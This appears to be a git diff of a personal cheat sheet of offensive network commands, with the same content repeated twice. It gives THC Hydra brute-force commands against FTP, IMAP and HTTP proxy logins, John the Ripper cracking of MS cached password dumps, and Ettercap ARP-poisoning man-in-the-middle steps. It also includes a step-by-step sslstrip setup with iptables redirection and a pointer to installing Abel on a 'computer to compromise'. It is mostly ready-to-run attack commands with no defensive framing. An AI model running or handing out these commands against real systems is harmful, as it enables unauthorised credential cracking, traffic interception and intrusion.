cmartinbaughman · October 25, 2011 20:38 · rad123456789r · Sep 26, 2019 · rad123456789r · Sep 26, 2019
diff --git a/handy_commands b/handy_commands
 #Cracking an FTP server (use whatever service you want THC Hydra supports lots!
  hydra -L wordlist.txt -P passlist.txt 192.168.1.1 ftp

 #Other handy THC Hydra commands~!
    #Log in to ftp service with -l user and -p password:
    ./hydra -l john -p doe 192.168.0.1 ftp

    #Log in to IMAP service using user wordlist with -L user.txt and the password -p secret:
    ./hydra -L user.txt -p secret 192.168.0.1 imap PLAIN
    
    #Log in to http-proxy trying user -l admin and password list: 
    ./hydra -l admin -P pass.txt http-proxy://192.168.0.1
    
    #Using -C argument to use a username:password formatted text file and the -6 uses IPv6:
    ./hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

 #Crack MS CACHE password dumps:
 #dumpfile in format: admin:23acb302913da1293840329a12931ac
  john -i:all -format:mscash dumpfile.txt

 #Ettercap Man In The Middle ARP sniffing attack:
 #NOTE: Launch ettercap GUI with packet dump: 
  ettercap -G -w ~/ettercap_packets.pcap

 #Stripping SSL with Ettercap and sslstrip:
  1. Redirect requests on port 80 (HTTP) to sslstrip running on port 10000
     sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
  2. Verify the entry in nat table
     sudo iptables --list -t nat
  3. Enable forwarding
     sudo echo "1" > /proc/sys/net/ipv4/ip_forward
  4. Check forwarding
     sudo cat /proc/sys/net/ipv4/ip_forward  (*NOTE: You should get 1 as a reply)
  5. Run sslstrip logging on port 10000
     sudo python sslstrip-0.7/sslstrip.py -w sslstrip.log -l 10000
  6. Monitor the log
     sudo tail -F sslstrip.log
  7. ettercap -G -w ~/ettercap_packets.pcap and perform the following in the GTK Ettercap NG GUI:
     a. Sniff -> Unified sniffing
     b. Hosts -> Scan for hosts && Hosts -> Hosts List
     c. Targets: TARGET 1 - Host(s) you want to attack, TARGET 2 - IP of router/switch/ or access point
     d. Mitm -> Arp poisoning - turn on Sniffing!

 #CAIN & ABEL
 #Open Cain (Gui) go to networking and select the computer to compromise, then right click and select install Abel, then you can do all kinds of stuff ;)
	#Cracking an FTP server (use whatever service you want THC Hydra supports lots!
	hydra -L wordlist.txt -P passlist.txt 192.168.1.1 ftp

	#Other handy THC Hydra commands~!
	#Log in to ftp service with -l user and -p password:
	./hydra -l john -p doe 192.168.0.1 ftp

	#Log in to IMAP service using user wordlist with -L user.txt and the password -p secret:
	./hydra -L user.txt -p secret 192.168.0.1 imap PLAIN

	#Log in to http-proxy trying user -l admin and password list:
	./hydra -l admin -P pass.txt http-proxy://192.168.0.1

	#Using -C argument to use a username:password formatted text file and the -6 uses IPv6:
	./hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

	#Crack MS CACHE password dumps:
	#dumpfile in format: admin:23acb302913da1293840329a12931ac
	john -i:all -format:mscash dumpfile.txt

	#Ettercap Man In The Middle ARP sniffing attack:
	#NOTE: Launch ettercap GUI with packet dump:
	ettercap -G -w ~/ettercap_packets.pcap

	#Stripping SSL with Ettercap and sslstrip:
	1. Redirect requests on port 80 (HTTP) to sslstrip running on port 10000
	sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
	2. Verify the entry in nat table
	sudo iptables --list -t nat
	3. Enable forwarding
	sudo echo "1" > /proc/sys/net/ipv4/ip_forward
	4. Check forwarding
	sudo cat /proc/sys/net/ipv4/ip_forward (*NOTE: You should get 1 as a reply)
	5. Run sslstrip logging on port 10000
	sudo python sslstrip-0.7/sslstrip.py -w sslstrip.log -l 10000
	6. Monitor the log
	sudo tail -F sslstrip.log
	7. ettercap -G -w ~/ettercap_packets.pcap and perform the following in the GTK Ettercap NG GUI:
	a. Sniff -> Unified sniffing
	b. Hosts -> Scan for hosts && Hosts -> Hosts List
	c. Targets: TARGET 1 - Host(s) you want to attack, TARGET 2 - IP of router/switch/ or access point
	d. Mitm -> Arp poisoning - turn on Sniffing!

	#CAIN & ABEL
	#Open Cain (Gui) go to networking and select the computer to compromise, then right click and select install Abel, then you can do all kinds of stuff ;)